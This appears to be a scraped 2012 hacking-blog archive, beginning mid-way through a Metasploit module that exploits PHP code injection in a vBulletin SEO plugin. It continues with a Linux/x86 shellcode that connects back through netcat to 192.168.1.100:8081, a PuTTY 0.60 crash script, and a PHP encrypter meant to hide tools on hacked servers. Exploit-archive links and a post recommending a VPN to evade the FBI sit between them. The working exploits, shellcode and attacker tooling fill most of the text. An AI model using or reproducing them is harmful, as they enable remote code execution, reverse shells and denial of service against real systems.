                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'       => 8190,
                    'Keys'        => ['php'],
                },
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Jan 23 2012',
            'DefaultTarget'  => 0))
            register_options(
                [
                    OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
                ], self.class)
    end
    def check
        flag = rand_text_alpha(rand(10)+10)
        data = "char_repl='{${print(#{flag})}}'=>"
        uri = ''
        uri << datastore['URI']
        uri << '/' if uri[-1,1] != '/'
        uri << 'vbseocp.php'
        response = send_request_cgi({
            'method' => "POST",
            'uri' => uri,
            'data' => "#{data}"
        })
        if response.code == 200 and response.body =~ /#{flag}/
            return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
    end
    def exploit
        if datastore['CMD']
            p = "passthru(\"%s\");" % datastore['CMD']
            p = Rex::Text.encode_base64(p)
        else
            p = Rex::Text.encode_base64(payload.encoded)
        end
        data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
        uri = ''
        uri << datastore['URI']
        uri << '/' if uri[-1,1] != '/'
        uri << 'vbseocp.php'
        response = send_request_cgi({
            'method' => 'POST',
            'uri' => uri,
            'data' => data,
            'headers' => { 'Code' => p }
        })
        print_status("%s" % response.body) if datastore['CMD']
    end
end

Linux/x86 - netcat : connect back port 8081 - 76 bytes

2012-01-30T22:39:00.001+06:00

Code:

# Title : Linux/x86 - netcat : connect back port 8081 - 76 bytes
# Author :TrOoN
# E-mail : SOUrRce-x@live.fr  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform :Linux/x86      | backBox    | uBuntU Fr
# Type : local exploit /SHELL CODE
###



/*
08048060 <_start>:
 8048060:       eb 2a                   jmp    804808c <GotoCall>
 
08048062 <shellcode>:
 8048062:       5e                      pop    %esi
 8048063:       31 c0                   xor    %eax,%eax
 8048065:       88 46 07                mov    %al,0x7(%esi)
 8048068:       88 46 15                mov    %al,0x15(%esi)
 804806b:       88 46 1a                mov    %al,0x1a(%esi)
 804806e:       89 76 1b                mov    %esi,0x1b(%esi)
 8048071:       8d 5e 08                lea    0x8(%esi),%ebx
 8048074:       89 5e 1f                mov    %ebx,0x1f(%esi)
 8048077:       8d 5e 16                lea    0x16(%esi),%ebx
 804807a:       89 5e 23                mov    %ebx,0x23(%esi)
 804807d:       89 46 27                mov    %eax,0x27(%esi)
 8048080:       b0 0b                   mov    $0xb,%al
 8048082:       89 f3                   mov    %esi,%ebx
 8048084:       8d 4e 1b                lea    0x1b(%esi),%ecx
 8048087:       8d 56 27                lea    0x27(%esi),%edx
 804808a:       cd 80                   int    $0x80
 
0804808c <GotoCall>:
 804808c:       e8 d1 ff ff ff          call   8048062 <shellcode>
 8048091:       2f                      das   
 8048092:       62 69 6e                bound  %ebp,0x6e(%ecx)
 8048095:       2f                      das   
 8048096:       6e                      outsb  %ds:(%esi),(%dx)
 8048097:       63 23                   arpl   %sp,(%ebx)
 8048099:       31 39                   xor    %edi,(%ecx)
 804809b:       32 2e                   xor    (%esi),%ch
 804809d:       31 36                   xor    %esi,(%esi)
 804809f:       38 2e                   cmp    %ch,(%esi)
 80480a1:       31 2e                   xor    %ebp,(%esi)
 80480a3:       31 30                   xor    %esi,(%eax)
 80480a5:       31 23                   xor    %esp,(%ebx)
 80480a7:       38 30                   cmp    %dh,(%eax)
 80480a9:       38 30                   cmp    %dh,(%eax)
 80480ab:       23 41 41                and    0x41(%ecx),%eax
 80480ae:       41                      inc    %ecx
 80480af:       41                      inc    %ecx
 80480b0:       42                      inc    %edx
 80480b1:       42                      inc    %edx
 80480b2:       42                      inc    %edx
 80480b3:       42                      inc    %edx
 80480b4:       43                      inc    %ebx
 80480b5:       43                      inc    %ebx
 80480b6:       43                      inc    %ebx
 80480b7:       43                      inc    %ebx
 80480b8:       44                      inc    %esp
 80480b9:       44                      inc    %esp
 80480ba:       44                      inc    %esp
 80480bb:       44                      inc    %esp
*/
 
// /bin/nc 192.168.1.100 8081
char shellcode[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x15\x88\x46\x1a\x89\x76\x1b\x8d\x5e\x08\x89"
"\x5e\x1f\x8d\x5e\x16\x89\x5e\x23\x89\x46\x27\xb0\x0b\x89\xf3\x8d\x4e\x1b\x8d\x56\x27"
"\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x23\x31\x39\x32\x2e\x31\x36"
"\x38\x2e\x31\x2e\x31\x30\x31\x23\x38\x30\x38\x30\x23";
 
int main()
{
    int *ret;
    ret = (int *)&ret + 2;
    (*ret) = (int)shellcode;
}

darkc0de.com [archive]

2012-01-29T17:12:00.002+06:00

Categories:

bruteforce

c0de

cheatsheets

encryption

exploits

ircbots

misc

others

scanners

tutorials

Download:
http://rapidshare.com/files/40712325...de.tar.gz.html

Online version

Security Video [site's]

2012-01-29T17:09:00.000+06:00

Black Hat

https://www.blackhat.com/html/archives.html [video presentation]

DEF CON

https://media.defcon.org/

OWASP

https://www.owasp.org/index.php/Category:OWASP_Video

Imperva

http://www.imperva.com/resources/videos.asp

Hacking Illustrated

http://www.irongeek.com/i.php?page=s...ingillustrated

The Hacker News Network

http://www.hackernews.com/

SecTor [Security Conference Toronto Canada]

http://www.sector.ca/presentations2010.htm

][akep

http://www.xakep.ru/articles/video/ [rus]

VULNERABILITY-LAB

http://www.youtube.com/user/vulnerability0lab

PhreakNIC

http://www.phreaknic.info/Videos/

Hackers Center

http://www.hackerscenter.com/index.php?/Video/General/

Good.net

http://avondale.good.net/dl/bd/

SecDocs

http://secdocs.lonerunners.net/docum...tegory/3-video

RealHacker Network

http://www.realhacker.net/category/videos

Hacking Forensic Security [HFS]

http://www.youtube.com/user/ChRiStIaAn008

Hacking Conferences Worldwide

FREE vpn [100% anonym]

2012-01-29T01:54:00.000+06:00

Hi.

i would like to share this with you.

ItsHidden offre free and paid vpn acces.

im talking about the free acces.

unlike proxy , its REALY anonym and the GRC ( canada ) or FBI can't find you , and a big way faster then proxy ( who's know VPN can tell you ).

the site
http://itshidden.com/

the link to register a free account
http://itshidden.com...bscribe&Itemid=

so thats it for now. my first contributuin

enjoy
©2011, copyright BLACK BURN

Shellfire VPN

2012-01-29T01:47:00.002+06:00

https://www.shellfire.net/vpn/

putty 0.60 Denial Of Service (DOS)

2012-01-29T01:42:00.002+06:00

print "n" 
print "----------------------------------------------------------------" 
print "| putty 0.60 Null Ptr                                           |" 
print "| Level Smash the Stack                                         |" 
print "----------------------------------------------------------------" 
print "n"
 import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
 ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
 ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
 "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
 "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
 "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
 "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
 "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
 "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
 "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
 "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
 "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
 "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
 "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
 "111001111111111111111111111111111"), ## The 00 controls the crash
 ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
 "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
 "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
 "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
 "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
 "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
 "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
 "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
 "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
 "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
 "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
 "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
 "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
 "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
 "cac4453d629a47d000000000000000000"),
 ("0000000c0a15a1640000c32700008e14")
 ]
  i = 0
for i in range(0,len(buf)):
    conn.send(binascii.unhexlify(buf[i]))
    i+=1
conn.close()
s.close()

PHP Crypt

2012-01-29T01:35:00.001+06:00

<?php
/************************************************



            PHP SOURCE CODE ENCRYPTER

                       BY 

                ReZEN of XORCREW



WHAT IT DOES:



Takes ANY php source file and encrypts it.  You

take the encrypter give it a file it then 

encrypts the file and spits out a new file with

the encrypted source.  When you try to access

the new file your asked for a username and pass.

You can use ANY username you want but the pass

has to be the same password you used to encrypt it

if you give it the right pass it then decrypts the 

file and you are able to access it.  



WHY YOUD USE IT:



You would use this to hide any PHP tools on the

server that you&#39;ve hacked that you don&#39;t want 

other hackers to have access to.  You could also

use it to encrypt an entire forum so incase you do 

get hacked theyd have to know the password to even

get to the config files.  Anyways its just a cool 

tool.



HAPPY VALENTINES DAY TO ALL MY VALENTINES BITCHES:







************************************************/




if(!isset($_POST[&#39;submit&#39;])){



echo  &#39;<table><form action="&#39;.$PHP_SELF.&#39;" method="post">&#39;

     .&#39;<tr><td><b>File:</b></td><td><input name="file" type="text" size="38"></td></tr>&#39;

     .&#39;<tr><td><b>Password For File:</b></td><td><input name="auth" type="password" size="38"></td></tr>&#39;

     .&#39;<tr><td><input type="submit" name="submit" value="Encrypt It!"></form></td></tr></table>&#39;;


}else{


function easy_crypt($string, $key){

   $iv_size = mcrypt_get_iv_size(MCRYPT_BLOWFISH, MCRYPT_MODE_CBC);

   $iv = mcrypt_create_iv($iv_size, MCRYPT_DEV_URANDOM);

   $string = mcrypt_encrypt(MCRYPT_BLOWFISH, $key,

                            $string, MCRYPT_MODE_CBC, $iv);

   return array(base64_encode($string), base64_encode($iv));
}


function easy_decrypt($cyph_arr, $key){

   $out = mcrypt_decrypt(MCRYPT_BLOWFISH, $key, base64_decode($cyph_arr[0]),

                         MCRYPT_MODE_CBC, base64_decode($cyph_arr[1]));

   return trim($out);
}



$file = $_POST[&#39;file&#39;];

$contents = file_get_contents($file);

$contents = str_replace(&#39;<&#39;.&#39;?php&#39;,&#39;<&#39;.&#39;?&#39;,$contents);

$contents = &#39;?&#39;.&#39;>&#39;.trim($contents).&#39;<&#39;.&#39;?&#39;;

$code = $_POST[&#39;auth&#39;];

$pass = sha1($_POST[&#39;auth&#39;]);

$cyph = easy_crypt($contents, $code);





$source = "

<?php



function easy_decrypt($cyph_arr, $key){

   $out = mcrypt_decrypt(MCRYPT_BLOWFISH, $key, base64_decode($cyph_arr[0]),

                         MCRYPT_MODE_CBC, base64_decode($cyph_arr[1]));

   return trim($out);

}



  if (!isset($_SERVER[&#39;PHP_AUTH_USER&#39;])) {

    header(&#39;WWW-Authenticate: Basic realm="Encrypted File"&#39;);

    header(&#39;HTTP/1.0 401 Unauthorized&#39;);

    echo &#39;Maybe Next Time Skid.&#39;;

    exit;

  }else{

    

   $code = $_SERVER[&#39;PHP_AUTH_PW&#39;];

   $cyph[0] = "".$cyph[0]."";

   $cyph[1] = "".$cyph[1]."";

   $dec_string = easy_decrypt($cyph, $code);

   eval($dec_string);

  }
?>